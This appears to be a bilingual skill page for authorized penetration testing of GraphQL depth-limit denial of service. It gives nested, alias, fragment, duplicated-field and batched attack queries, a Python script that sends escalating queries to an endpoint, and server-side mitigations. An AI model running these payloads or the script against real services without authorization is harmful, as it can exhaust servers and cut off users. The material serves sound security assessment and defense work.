Tests GraphQL APIs for depth limit DoS vulnerabilities using deeply nested recursive queries, aliases, fragments, field duplication, and batching. Useful for authorized penetration testing of GraphQL endpoints.
npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
GraphQL 深度限制攻击利用 GraphQL Schema 的递归特性,构造深度嵌套的查询来消耗过多的服务器资源,从而导致拒绝服务(DoS)。与具有固定端点的 REST API 不同,GraphQL 允许客户端请求任意数据结构。当 Schema 包含循环关系时(例如 User -> Posts -> Author -> Posts),攻击者可以创建无限递归的查询,使服务器的 CPU、内存、数据库连接和网络带宽超负荷。
Tests GraphQL APIs for depth limit vulnerabilities using deeply nested recursive queries to identify DoS risks during security assessments and penetration testing.
Tests GraphQL APIs for depth limit vulnerabilities using deeply nested recursive queries and aliases to simulate denial-of-service attacks during security assessments.
Performs GraphQL introspection attacks to extract full API schemas, identify sensitive queries/mutations, test depth/complexity limits, and exploit batch/alias brute-force/nested DoS vulnerabilities.
Share bugs, ideas, or general feedback.
GraphQL 深度限制攻击利用 GraphQL Schema 的递归特性,构造深度嵌套的查询来消耗过多的服务器资源,从而导致拒绝服务(DoS)。与具有固定端点的 REST API 不同,GraphQL 允许客户端请求任意数据结构。当 Schema 包含循环关系时(例如 User -> Posts -> Author -> Posts),攻击者可以创建无限递归的查询,使服务器的 CPU、内存、数据库连接和网络带宽超负荷。
当 GraphQL Schema 存在双向关系时,查询可以递归引用这些关系:
# 具有循环引用的 Schema:
# type User { posts: [Post] }
# type Post { author: User }
# 使用过度嵌套深度的攻击查询
query DepthAttack {
users {
posts {
author {
posts {
author {
posts {
author {
posts {
author {
posts {
author {
posts {
title
author {
name
}
}
}
}
}
}
}
}
}
}
}
}
}
}
当批量查询被阻断时,别名可以在单个查询中将相同的字段请求倍增:
query AliasAmplification {
a1: user(id: 1) { posts { author { name } } }
a2: user(id: 1) { posts { author { name } } }
a3: user(id: 1) { posts { author { name } } }
a4: user(id: 1) { posts { author { name } } }
a5: user(id: 1) { posts { author { name } } }
a6: user(id: 1) { posts { author { name } } }
a7: user(id: 1) { posts { author { name } } }
a8: user(id: 1) { posts { author { name } } }
a9: user(id: 1) { posts { author { name } } }
a10: user(id: 1) { posts { author { name } } }
}
Fragment 可以更高效地构建复杂的深度嵌套查询:
fragment UserFields on User {
name
email
posts {
title
comments {
body
author {
...NestedUser
}
}
}
}
fragment NestedUser on User {
name
posts {
title
author {
name
posts {
title
author {
name
}
}
}
}
}
query FragmentAttack {
users {
...UserFields
}
}
在选择集中重复同一字段多次会增加处理负担:
query FieldDuplication {
user(id: 1) {
posts { title }
posts { title }
posts { title }
posts { title }
posts { title }
posts { title }
posts { title }
posts { title }
posts { title }
posts { title }
}
}
在单个 HTTP 请求中发送多个查询:
[
{"query": "{ users { posts { author { name } } } }"},
{"query": "{ users { posts { author { name } } } }"},
{"query": "{ users { posts { author { name } } } }"},
{"query": "{ users { posts { author { name } } } }"},
{"query": "{ users { posts { author { name } } } }"}
]
#!/usr/bin/env python3
"""GraphQL 深度限制攻击测试工具
通过发送递进式深度嵌套查询,测试 GraphQL 端点的深度限制漏洞。
"""
import requests
import time
import json
import sys
from typing import Optional
class GraphQLDepthTester:
def __init__(self, endpoint: str, headers: Optional[dict] = None):
self.endpoint = endpoint
self.headers = headers or {"Content-Type": "application/json"}
self.results = []
def generate_nested_query(self, depth: int, field_a: str = "posts",
field_b: str = "author",
leaf_field: str = "name") -> str:
"""生成指定深度的递归嵌套 GraphQL 查询。"""
query = "{ users { "
for i in range(depth):
if i % 2 == 0:
query += f"{field_a} {{ "
else:
query += f"{field_b} {{ "
query += leaf_field
query += " }" * (depth + 1) # 关闭所有括号
query += " }"
return query
def generate_alias_query(self, count: int, inner_query: str) -> str:
"""生成包含多个别名的查询。"""
aliases = []
for i in range(count):
aliases.append(f"a{i}: {inner_query}")
return "{ " + " ".join(aliases) + " }"
def send_query(self, query: str, timeout: int = 30) -> dict:
"""发送 GraphQL 查询并测量响应指标。"""
payload = json.dumps({"query": query})
start_time = time.time()
try:
response = requests.post(
self.endpoint,
data=payload,
headers=self.headers,
timeout=timeout
)
elapsed = time.time() - start_time
return {
"status_code": response.status_code,
"response_time": round(elapsed, 3),
"response_size": len(response.content),
"has_errors": "errors" in response.json() if response.status_code == 200 else True,
"error_message": self._extract_error(response),
"success": response.status_code == 200 and "errors" not in response.json()
}
except requests.exceptions.Timeout:
elapsed = time.time() - start_time
return {
"status_code": 0,
"response_time": round(elapsed, 3),
"response_size": 0,
"has_errors": True,
"error_message": "请求超时",
"success": False
}
except requests.exceptions.ConnectionError:
return {
"status_code": 0,
"response_time": 0,
"response_size": 0,
"has_errors": True,
"error_message": "连接被拒绝——可能已发生 DoS",
"success": False
}
def _extract_error(self, response) -> str:
try:
data = response.json()
if "errors" in data:
return data["errors"][0].get("message", "未知错误")
except (json.JSONDecodeError, IndexError, KeyError):
pass
return ""
def test_depth_limits(self, max_depth: int = 20):
"""递进测试递增的查询深度。"""
print(f"测试从 1 到 {max_depth} 的深度限制...")
print(f"{'深度':<8}{'状态码':<10}{'时间(s)':<12}{'大小(B)':<12}{'结果'}")
print("-" * 65)
for depth in range(1, max_depth + 1):
query = self.generate_nested_query(depth)
result = self.send_query(query)
result["depth"] = depth
self.results.append(result)
status = "通过" if result["success"] else "已拦截"
print(f"{depth:<8}{result['status_code']:<10}{result['response_time']:<12}"
f"{result['response_size']:<12}{status}")
if result["error_message"] and "depth" in result["error_message"].lower():
print(f"\n[+] 在深度 {depth} 处检测到深度限制")
print(f" 错误:{result['error_message']}")
return depth
if result["status_code"] == 0:
print(f"\n[!] 服务器在深度 {depth} 处变得无响应")
return depth
print(f"\n[!] 警告:在最大深度 {max_depth} 内未检测到深度限制")
return None
def test_alias_amplification(self, alias_counts: list = None):
"""测试基于别名的放大攻击。"""
if alias_counts is None:
alias_counts = [1, 5, 10, 25, 50, 100]
print(f"\n测试别名放大攻击...")
inner = 'user(id: "1") { posts { title } }'
for count in alias_counts:
query = self.generate_alias_query(count, inner)
result = self.send_query(query)
status = "通过" if result["success"] else "已拦截"
print(f" 别名数:{count:<6} 状态码:{result['status_code']:<6} "
f"时间:{result['response_time']:<8}s {status}")
def generate_report(self) -> dict:
"""生成所有测试的摘要报告。"""
successful = [r for r in self.results if r["success"]]
blocked = [r for r in self.results if not r["success"]]
max_successful_depth = max([r["depth"] for r in successful], default=0)
return {
"endpoint": self.endpoint,
"total_tests": len(self.results),
"successful_queries": len(successful),
"blocked_queries": len(blocked),
"max_successful_depth": max_successful_depth,
"depth_limit_enforced": len(blocked) > 0,
"vulnerability": "HIGH" if max_successful_depth > 10 else
"MEDIUM" if max_successful_depth > 5 else "LOW"
}
if __name__ == "__main__":
endpoint = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:4000/graphql"
tester = GraphQLDepthTester(endpoint)
tester.test_depth_limits(max_depth=15)
tester.test_alias_amplification()
report = tester.generate_report()
print(f"\n{'='*50}")
print(f"报告摘要")
print(f"{'='*50}")
for key, value in report.items():
print(f" {key}: {value}")
// 使用 graphql-depth-limit(Node.js)
const depthLimit = require('graphql-depth-limit');
const server = new ApolloServer({
typeDefs,
resolvers,
validationRules: [depthLimit(5)]
});
// 使用 graphql-query-complexity
const { createComplexityRule } = require('graphql-query-complexity');
const complexityRule = createComplexityRule({
maximumComplexity: 1000,
estimators: [
fieldExtensionsEstimator(),
simpleEstimator({ defaultComplexity: 1 })
],
onComplete: (complexity) => {
console.log('查询复杂度:', complexity);
}
});
# 服务器端超时配置
GRAPHQL_CONFIG = {
"max_depth": 5,
"max_complexity": 1000,
"max_aliases": 10,
"query_timeout_seconds": 10,
"max_batch_size": 5,
"rate_limit_per_minute": 100
}